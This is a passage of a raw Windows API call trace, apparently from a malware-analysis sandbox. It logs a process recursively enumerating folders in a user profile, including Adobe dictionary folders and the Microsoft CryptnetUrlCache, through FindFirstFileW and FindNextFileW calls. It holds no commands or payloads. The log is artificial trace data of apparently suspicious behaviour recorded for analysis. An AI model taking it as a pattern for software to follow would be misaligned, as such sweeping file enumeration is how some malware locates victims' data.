cFileName="grm", cAlternateFileName="")) returned 1 [0057.589] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.589] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.589] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.589] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.589] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.589] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0057.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.590] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.590] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.590] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.590] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.590] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0057.590] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.590] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.590] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.590] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.590] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.590] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0057.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.591] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.591] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.591] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.591] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.591] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0057.591] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.591] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.591] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.591] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.591] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.592] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0057.592] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c3f68 [0057.592] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.592] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aae6a4 | out: lpFindFileData=0x3aae6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.592] FindClose (in: hFindFile=0x6c3f68 | out: hFindFile=0x6c3f68) returned 1 [0057.592] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0057.592] FindNextFileW (in: hFindFile=0x6c43a8, lpFindFileData=0x3aae920 | out: lpFindFileData=0x3aae920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0057.592] FindClose (in: hFindFile=0x6c43a8 | out: hFindFile=0x6c43a8) returned 1 [0057.592] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3ff70d8 | out: hHeap=0x5d0000) returned 1 [0057.592] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0057.592] FindClose (in: hFindFile=0x6c4468 | out: hFindFile=0x6c4468) returned 1 [0057.592] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.592] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries", cAlternateFileName="DICTIO~1")) returned 0 [0057.592] FindClose (in: hFindFile=0x6c4428 | out: hFindFile=0x6c4428) returned 1 [0057.593] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0057.593] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0057.593] FindClose (in: hFindFile=0x6c4028 | out: hFindFile=0x6c4028) returned 1 [0057.593] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0057.596] FindNextFileW (in: hFindFile=0x6c4168, lpFindFileData=0x3aaf310 | out: lpFindFileData=0x3aaf310*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0057.597] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4028 [0057.597] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.597] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0057.597] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4428 [0057.597] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.597] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0057.598] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4468 [0057.598] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.598] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0057.598] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x561, dwReserved0=0x0, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0057.599] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0057.599] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xf1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0057.599] FindNextFileW (in: hFindFile=0x6c4468, lpFindFileData=0x3aaeb9c | out: lpFindFileData=0x3aaeb9c*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, 